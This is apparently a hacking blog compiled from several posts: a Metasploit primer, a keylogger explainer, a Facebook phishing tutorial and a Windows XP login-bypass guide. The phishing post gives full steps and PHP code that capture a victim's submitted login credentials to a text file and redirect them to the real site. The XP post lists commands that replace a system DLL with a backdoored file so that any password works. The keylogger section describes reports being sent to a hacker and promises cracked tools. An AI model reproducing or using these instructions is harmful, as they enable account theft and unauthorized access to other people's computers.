Its a powerful tool used for penetration testing. Learning to work with metasploit needs a lot of efforts and time. Ofcourse to can learn metasploit overnight, it needs lots of practice and patience
Download here(windows user) http://www.metasploit.com/releases/framework-3.2.exeDownload here(linux user) http://www.metasploit.com/releases/framework-3.2.tar.gz

Just give a look at following basic steps for beginners to break into a system using metasploit after gathering some information about the target system.
1. Select a right exploit and then set the target. 2.Verify the exploit options to determine whether the target system is vulnerable to the exploit. 3.Select a payload 4.Execute the exploit.You must be confused !!!!

Now carefully read the following basic terms to get an idea about these four steps mentioned above .I have defined the terms technically and side by side explained in layman language to clarify the things. I have taken an example that an attacker wants to break into a house . I hope my this approach will give you a great idea about these basic terms .
 


Vulnerability -A weakness which allows an attacker to break into or compromise a system's security.

Like the main gate of house with a weak lock (can be easily opened) , a glass window of house(can be easily broken) etc can be the vulnerabilities in the systems which make it easy for an attacker to break into.

Exploit - Code which allows an attacker to take advantage of a vulnerability system.

The set of different keys which he can try one by one to open the lock , the hammer with him which he can use to break the glass window etc can be the exploits.

Payload- Actual code which runs on the system after exploitation

Now Finally after exploiting the vulnerability and breaking in , he can have different things to do. He can steal money, destroy the things or just can give a look and come back.. Deciding this is what we mean by setting the Payload.

I hope its enough friends, You will learn more with further tutorials when you will start working with metasploit practically.

What is Keylogger?

A Keylogger is a Program or hardware that record all the typed material.

"Keystroke logging (often called keylogging) is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. There are numerous keylogging methods, ranging from hardware and software-based approaches to electromagnetic and acoustic analysis." 
According to Wikipedia.


Types Of Keyloggers::


There are two main types of keyloggers:
1: Hardware

2: Software


How can they be used for hacking.


For hacking Software Keyloggers are used which are installed on Victims computer manually or remortely and then the report of the the Keylogger is presented to the Hackers in form of Email or it is uploaded to specific FTP account of Hacker.


Where Can i Get a Keylogger?


Most of Keyloggers are expensive commercial one. But I will put some free and cracks of Keyloggers soon which are free!!!!

Friday, December 3, 2010

Hacking Facebook account with Phishing!!!!



The way s the easiest and most commonly use way of hacking a Facbook account.

Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.html
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="lol.php"
Step6 : now open a notepad and type following as it is.




<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”hello.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>


NOW save this as lol.php


Step7 : now make a account on t35.com and Upload


Login.html
lol.php
hello.txt






NOTE: You ahve to make the other person enter his password and you can get the password by downloading the hello.txt file from your t35.com account by cPanel.

There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorization.


Steps to Hack into a Windows XP Computer without changing password:

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL from Official website or from Rapidshare.
3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
How to Hack Into a Windows XP Computer Without Changing Password – www.crack$hack.ws
14. Go to commands and enable the options and enable the god command.
How to Hack Into a Windows XP Computer Without Changing Password – www.crack$hack.ws
15. Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | cna certification